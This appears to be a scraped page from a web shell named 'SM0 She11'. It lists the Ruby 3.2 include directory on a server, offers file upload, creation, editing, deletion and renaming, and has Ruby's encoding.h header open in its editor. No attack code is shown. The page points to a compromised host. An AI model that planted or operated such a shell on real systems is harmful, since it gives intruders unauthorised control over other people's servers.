SM0 She11
Path:
/
/
opt
/
alt
/
ruby32
/
include
/
ruby
Full Path (server): /opt/alt/ruby32/include/ruby
Create Fil3
Upl04d Fil3
📄 assert.h
[E]
[D]
[R]
📄 atomic.h
[E]
[D]
[R]
📁 backward
Open
[D]
[R]
📄 backward.h
[E]
[D]
[R]
📄 config-x86_64.h
[E]
[D]
[R]
📄 config.h
[E]
[D]
[R]
📄 debug.h
[E]
[D]
[R]
📄 defines.h
[E]
[D]
[R]
📄 digest.h
[E]
[D]
[R]
📄 encoding.h
[E]
[D]
[R]
📁 fiber
Open
[D]
[R]
📄 intern.h
[E]
[D]
[R]
📁 internal
Open
[D]
[R]
📁 io
Open
[D]
[R]
📄 io.h
[E]
[D]
[R]
📄 memory_view.h
[E]
[D]
[R]
📄 missing.h
[E]
[D]
[R]
📄 onigmo.h
[E]
[D]
[R]
📄 oniguruma.h
[E]
[D]
[R]
📄 ractor.h
[E]
[D]
[R]
📄 random.h
[E]
[D]
[R]
📄 re.h
[E]
[D]
[R]
📄 regex.h
[E]
[D]
[R]
📄 ruby.h
[E]
[D]
[R]
📄 st.h
[E]
[D]
[R]
📄 subst.h
[E]
[D]
[R]
📄 thread.h
[E]
[D]
[R]
📄 thread_native.h
[E]
[D]
[R]
📄 util.h
[E]
[D]
[R]
📄 version.h
[E]
[D]
[R]
📄 vm.h
[E]
[D]
[R]
Editing: encoding.h
#ifndef RUBY_ENCODING_H /*-*-C++-*-vi:se ft=cpp:*/ #define RUBY_ENCODING_H 1 /** * @file * @author $Author: matz $ * @date Thu May 24 11:49:41 JST 2007 * @copyright Copyright (C) 2007 Yukihiro Matsumoto * @copyright This file is a part of the programming language Ruby. * Permission is hereby granted, to either redistribute and/or * modify this file, provided that the conditions mentioned in the * file COPYING are met. Consult the file for details. * @brief Encoding relates APIs. * * These APIs are mainly for implementing encodings themselves. Encodings are * built on top of Ruby's core CAPIs. Though not prohibited, there can be * relatively less rooms for things in this header file be useful when writing * an extension library. */ #include "ruby/ruby.h" #include "ruby/internal/encoding/coderange.h" #include "ruby/internal/encoding/ctype.h" #include "ruby/internal/encoding/encoding.h" #include "ruby/internal/encoding/pathname.h" #include "ruby/internal/encoding/re.h" #include "ruby/internal/encoding/sprintf.h" #include "ruby/internal/encoding/string.h" #include "ruby/internal/encoding/symbol.h" #include "ruby/internal/encoding/transcode.h" #endif /* RUBY_ENCODING_H */
Save